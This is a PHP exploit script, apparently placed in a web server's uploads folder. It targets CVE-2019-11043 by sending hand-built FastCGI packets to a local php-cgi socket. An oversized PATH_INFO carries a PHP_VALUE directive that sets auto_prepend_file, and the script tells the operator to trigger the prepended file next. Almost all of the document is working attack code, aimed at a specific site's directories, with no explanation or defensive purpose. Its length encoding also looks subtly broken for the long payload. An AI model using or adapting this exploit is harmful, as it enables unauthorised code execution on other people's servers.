📖 File Reader
<?php
// cve_set_prepend.php - Attempts to set auto_prepend_file via CVE-2019-11043
$socketFile = '/tmp/php-cgi-73.sock';
$targetScript = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/audit.php'; // any existing PHP file
// Build malicious PATH_INFO (long filler + PHP_VALUE newline directive)
$filler = str_repeat('x', 1000); // length > 825 to trigger overflow
$directive = "auto_prepend_file=/tmp/prepend_test.php";
$payload = '/' . $filler . '/PHP_VALUE' . "\n" . $directive;
// FastCGI constants
define('FCGI_BEGIN_REQUEST', 1);
define('FCGI_PARAMS', 4);
define('FCGI_STDIN', 5);
define('FCGI_RESPONDER', 1);
function fcgi_packet($type, $content, $requestId = 1) {
$version = 1;
$paddingLength = (8 - (strlen($content) % 8)) % 8;
$packet = pack('CCnn', $version, $type, $requestId, strlen($content));
$packet .= $content;
$packet .= str_repeat("\0", $paddingLength);
return $packet;
}
$socket = stream_socket_client('unix://' . $socketFile, $errno, $errstr, 30);
if (!$socket) die("Socket connection failed: $errstr\n");
$requestId = 1;
// Begin request
$content = pack('nC5', FCGI_RESPONDER, 0, 0, 0, 0, 0);
fwrite($socket, fcgi_packet(FCGI_BEGIN_REQUEST, $content, $requestId));
// Environment variables – crucial: PATH_INFO contains the payload
$params = [
'SCRIPT_FILENAME' => $targetScript,
'REQUEST_METHOD' => 'GET',
'QUERY_STRING' => '',
'CONTENT_TYPE' => '',
'CONTENT_LENGTH' => '0',
'SCRIPT_NAME' => '/audit.php',
'PATH_INFO' => $payload,
'DOCUMENT_ROOT' => '/www/wwwroot/hljrlsj.com',
'SERVER_SOFTWARE' => 'PHP FastCGI Client',
'GATEWAY_INTERFACE' => 'CGI/1.1',
];
$paramContent = '';
foreach ($params as $name => $value) {
$nameLen = strlen($name);
$valueLen = strlen($value);
$paramContent .= pack('C', $nameLen) . pack('C', $valueLen) . $name . $value;
}
fwrite($socket, fcgi_packet(FCGI_PARAMS, $paramContent, $requestId));
fwrite($socket, fcgi_packet(FCGI_PARAMS, '', $requestId)); // end of params
// Empty STDIN
fwrite($socket, fcgi_packet(FCGI_STDIN, '', $requestId));
// Read and discard response
while (!feof($socket)) {
$header = fread($socket, 8);
if (strlen($header) < 8) break;
$data = unpack('Cversion/Ctype/nrequestId/ncontentLength/CpaddingLength/Creserved', $header);
fread($socket, $data['contentLength']);
fread($socket, $data['paddingLength']);
if ($data['type'] == 3) break; // FCGI_END_REQUEST
}
fclose($socket);
echo "Exploit sent. Now trigger a normal PHP request to include the prepend file.\n";
?>